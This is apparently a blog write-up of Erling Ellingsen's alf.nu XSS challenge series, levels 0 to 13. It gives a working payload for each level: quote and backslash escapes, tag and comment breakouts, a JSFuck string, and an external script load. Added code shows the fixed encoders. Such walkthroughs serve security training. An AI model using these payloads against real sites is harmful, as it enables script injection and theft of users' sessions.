
If you haven't seen them already, this is a series of XSS challenges by Erling Ellingsen. The challenges are really good, and if you haven't attempted them yet, you should definitely try them yourself before reading the writeups here.

There are 15 challenges overall, so let's go through the writeups one by one.

Level 0:

Well, this is very easy. There is no regex check nor any filter, so it's straightforward. Let's close the console.log() call first, add our little alert(1), and then balance the quote afterwards.

Payload: ");alert(1)("

Level 1:

A small change from the previous level: single quotes are now escaped globally (note the /g in the regex check) with a backslash. The way to bypass this is to supply a backslash followed by the quote. The filter turns that into \\' (our backslash, the inserted backslash, then the quote), so the two backslashes cancel each other out, the quote stays live, and we can execute alert(1).

Payload: \');alert(1)//

Level 2:

If you play with JSON.stringify() a bit, you can see that it escapes double quotes, so we cannot inject one. The interesting thing is that it does not escape angle brackets. So the easiest way is to close the script tag that is already open and start a new one containing alert(1).

Payload: </script><script>alert(1)//

Level 3:

One quick thing to notice with this challenge is that it is in a URL context, so the best way to get past the filter is URL encoding. Since the double quote (") is filtered, we can bypass the filter by URL-encoding the double quote, which is simply %22.

Payload: %22);alert(1)//


Level 4:

One quick thing to note here is that the developer forgot to remove double quotes globally (only the first instance is removed), and we can make use of this. We can also exploit the image alt attribute by crafting input that produces the output the regex expects, together with an event handler that triggers the XSS.

Payload: [[a|'onload='alert(1)]]
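The three filter weaknesses described in Levels 1, 2 and 4 (escaping quotes without escaping backslashes, JSON.stringify leaving angle brackets alone, and a non-global replace), each beside the encoding that closes the hole, as an added JavaScript example that is not the challenge's own code; the filter functions are reconstructions of what the writeup describes, not the alf.nu source.

```javascript
// Added example (not the alf.nu challenge source): three output-encoding
// mistakes described in Levels 1, 2 and 4, each beside a fixed version.
// The "filters" below are reconstructions of what the writeup describes.

// Level 1: escaping quotes but not backslashes. A backslash in the input
// cancels the backslash the filter inserts, so the quote stays live.
function quoteOnlyEscape(s) {
  return s.replace(/'/g, "\\'");
}
function backslashAwareEscape(s) {
  // Escape the escape character first, then the quote.
  return s.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
}
// True if the escaped text still holds a quote preceded by an even number
// (possibly zero) of backslashes, i.e. a quote the JS parser will honour.
function hasLiveQuote(escaped) {
  return /(^|[^\\])(\\\\)*'/.test(escaped);
}

// Level 2: JSON.stringify escapes quotes but not angle brackets, so a value
// placed inside <script> can still close the tag. Replacing < and > with
// \u escapes keeps the JSON valid while making it inert as HTML.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}
function canCloseScript(jsText) {
  return /<\/script/i.test(jsText);
}

// Level 4: replace() with a string pattern, or a regex without /g, removes
// only the first occurrence; a global regex removes them all.
function removeFirstQuoteOnly(s) {
  return s.replace('"', "");
}
function removeAllQuotes(s) {
  return s.replace(/"/g, "");
}

// Constructed sample inputs (modelled on the page's payloads).
const level1Input = "\\');alert(1)//";
const level2Input = "</script><script>alert(1)//";
console.log(hasLiveQuote(quoteOnlyEscape(level1Input)));      // true
console.log(hasLiveQuote(backslashAwareEscape(level1Input))); // false
console.log(canCloseScript(JSON.stringify(level2Input)));     // true
console.log(canCloseScript(jsonForScript(level2Input)));      // false
```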

Level 5:

Well, things get interesting here, as there is no way to inject a double quote. So we need to use the img and href parts together in such a way that one closes the other's context, letting us inject an event handler.

OK, this means we control whatever ends up inside the alt attribute. Let's see what happens if we inject http:// there.

Now that looks cool. You can see that the alt context is closed by the double quote that comes with the href, which means we can try injecting our own event handler (since double quotes are filtered, we use single quotes).

Payload: [[a|http://onload='alert(1)']]

Level 6:


This is an easy level where I nevertheless got stuck for a long time. I used the browser console to try out many functions whose names start with "create", but it was too difficult to find one that does not filter any characters. After a lot of time, I looked at the comment, which is when I realized this is so easy.

Well, let's close the comment and then inject our string.

Payload: Comment#--><script>alert(1)</script>

Level 7:

An important thing to note here is that the callback can contain single quotes ', which is a big help. We are already in the script context, so the easiest thing to do is to wrap the existing content in single quotes, turning it into a string, and then inject our payload.

Payload: '#';alert(1)//

Level 8:

Well, the first thing that came to mind was JSFuck, since it easily bypasses the uppercase filter, but the resulting payload is far too long. A better way is to close the existing script tag and open a new one with a src attribute.

Payload: </script><script src='site.com/1.js'>

Level 9:

Since angle brackets are blocked here, there is no other way than to use JSFuck (non-alphanumeric JavaScript).

Payload: '+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])())//

I am not sure of any other way to solve this. If you know a shorter method, please comment on this post and let us discuss (I have seen some, but they were a bit difficult to understand) :)

Level 10:

This one is inside the script context with quotes and angle brackets filtered. One thing to note, though, is that the backslash is not escaped, so the easiest way here is to use JavaScript's \u hex escapes for the angle brackets.

Payload: \u003cimg src=a onerror=alert(1)\u003e

Level 11:

This one is easy, as the filter used is the most common one seen around. After the filter runs, we need the word script to remain intact.

Payload: </</scriptscript><script>alert(1)//
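An added example (not the challenge's own code) of why a one-pass removal filter can be reassembled, run over the Level 11 payload above, beside the entity encoding a defender should use instead; the filter is an assumed one, chosen because stripping </script reproduces the behaviour the payload relies on.

```javascript
// Added example (not the alf.nu challenge source): a removal-based filter
// can be defeated because deleting a substring joins the characters on
// either side of it, possibly into a new copy of the very token removed.

// Assumed filter, modelled on the Level 11 payload: strips "</script" in
// a single pass and otherwise drops the input into the page unchanged.
function stripFilter(input) {
  return input.replace(/<\/script/gi, "");
}

// Does the filtered output still contain a closing script tag?
function reassembles(input) {
  return /<\/script>/i.test(stripFilter(input));
}

// The fix is to encode, not strip: an entity-encoded value cannot open
// or close any tag in HTML text or attribute context, whatever it held.
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// True if no raw angle bracket survives encoding.
function encodedIsInert(input) {
  return !/[<>]/.test(htmlEncode(input));
}

// The page's Level 11 payload, used as sample input.
const level11Input = "</</scriptscript><script>alert(1)//";
console.log(stripFilter(level11Input)); // </script><script>alert(1)//
console.log(reassembles(level11Input));  // true
console.log(encodedIsInert(level11Input)); // true
```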


Level 12:

This is quite similar to the one we saw before, except that this time backslashes are escaped, making it difficult for us to comment out the rest of the string. Well, just use <!-- :P

Payload: '#';alert(1)<!--

Level 13:

I took quite some time to understand this challenge, but it is almost clear to me now (I had to read some writeups already written to understand it). The main point to understand here is that if an iframe sets its window.name to youWon, the new name gets injected into the parent's global window object, which in turn sets the youWon variable and leads to the call of alert(1).

You can also see that whatever we give as input to print.alf.nu is reflected back in the response, which makes our task easier!

Payload: name='youWon'


I still haven't properly understood the last two levels of these challenges. I will update the page once I clearly understand how they can be solved. Thanks for reading, and let me know if you have any comments!
